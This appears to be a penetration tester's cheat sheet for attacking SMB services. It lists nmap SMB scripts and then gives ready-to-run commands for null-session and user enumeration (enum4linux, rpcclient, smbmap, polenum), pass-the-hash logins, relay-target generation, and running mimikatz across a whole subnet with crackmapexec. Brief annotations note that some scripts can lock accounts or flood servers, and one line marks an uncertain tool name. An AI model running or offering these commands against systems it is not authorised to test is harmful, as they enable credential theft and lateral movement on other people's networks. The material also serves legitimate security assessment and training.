/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-services.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
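- nmap --script "smb-*" -p 139,445 172.21.0.0
  (the smb-* pattern also selects smb-brute and smb-flood from the list above, which can lock accounts or exhaust the server's connection limit; the smb-enum-* form below is the narrower choice)
- nmap --script "smb-enum-*" -p 139,445 172.21.0.0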
- enum4linux -a 172.21.0.0
- enum4linux -U 172.21.0.0
- enum4linux -r 172.21.0.0
- enum4linux -S 172.21.0.0
https://github.com/cddmp/enum4linux-ng
- enum4linux 172.21.0.0 -A
- enum4linux-ng 172.21.0.0 -A -C
- enum4linux 172.21.0.0 -S
- enum4linux 172.21.0.0 -K ticket.kirbi -A
- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
- smbclient -L 172.21.0.0
- smbclient //172.21.0.0/tmp
Recursively list a directory:
$ smbclient \\\\x.x.x.x\\Folder
smb: \> recurse on
smb: \> ls
- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
- impacket-smbclient username@172.21.0.0
- impacket-samrdump 172.21.0.0  (the original note read "Impackert-sam SMB"; presumably Impacket's samrdump, confirm)
- rpcclient -U "" -N 172.21.0.0 enumdomusers
- crackmapexec smb -L
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
- crackmapexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24
- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
- crackmapexec smb x.x.x.x --pass-pol -u '' -p ''
- polenum -u '' -p '' -d x.x.x.x